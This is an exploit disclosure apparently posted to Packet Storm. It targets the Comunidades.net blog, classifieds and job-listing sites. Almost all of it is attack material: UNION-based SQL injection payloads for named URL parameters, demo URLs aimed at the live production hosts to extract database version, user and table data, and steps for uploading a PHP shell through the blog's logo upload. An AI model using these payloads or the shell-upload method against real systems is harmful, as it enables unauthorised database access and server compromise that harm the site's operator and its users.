Comunidades.net SQL Injection / Shell Upload

2010-06-30T00:00:00
ID PACKETSTORM:91303
Type packetstorm
Reporter MasterGipy
Modified 2010-06-30T00:00:00

Description

                                        
                                            `  
  
_____________________________________________________________  
  
[$] Exploit Title : Comunidades.net Multi Vulnerability  
[$] Date : 29-06-2010   
[$] Author : MasterGipy  
[$] Email : mastergipy [at] gmail.com  
[$] Bug : SQL Injection & Arbitrary Remote File Upload  
[$] Site : http://comunidades.net/  
[$] Google Dork : n/a  
  
  
[= Blogs - Comunidades.net =]  
  
[SQL Injection]  
  
[$] Exploit: index.php?op=arquivo&idtopico=[SQLi]  
index.php?op=arquivo&idtopico=-1 UNION ALL SELECT 1,version(),3,4,5,6,7,8,9--  
  
[D] Demo: http://blog.comunidades.net/revoteam/index.php?op=arquivo&idtopico=index.php?op=arquivo&idtopico=-1+UNION+ALL+SELECT 1,count(*),user(),4,version(),6,7,8,9+from+ciber_blogs.correspondentes--  
  
  
  
[Arbitrary Remote File Upload]  
1 - Create a Blog  
  
2 - Login into admin panel (http://blog.comunidades.net/painel/)  
  
3 - Then go:  
Título e Logotipo > Logotipo (upload any file type)  
  
Files go to http://blog.comunidades.net/USERNAME/logotipo.(extension)  
Ex: myshell.php > logotipo.php  
myimage.png > logotipo.png  
  
  
  
  
  
[= Classificados - Comunidades.net =]  
  
  
[SQL Injection]  
  
[$] Exploit: anuncio_procura.php?categ_id=[SQLi]  
anuncio_procura.php?categ_id=-1 UNION ALL SELECT 1,version(),3,4--  
  
[D] Demo: http://classificados.comunidades.net/anuncio_procura.php?categ_id=-1 UNION ALL SELECT 1,version(),3,4--  
  
  
  
  
  
  
[= Emprego - Comunidades.net =]  
  
  
[SQL Injection]  
  
[$] Exploit: ofertas_procura.php?categ_id=[SQLi]  
ofertas_procura.php?categ_id=-1 UNION ALL SELECT 1,2--  
  
[D] Demo: http://emprego.comunidades.net/ofertas_procura.php?categ_id=-1 UNION ALL SELECT 1,version()--  
  
  
  
  
  
[§] Greetings from PORTUGAL ^^  
`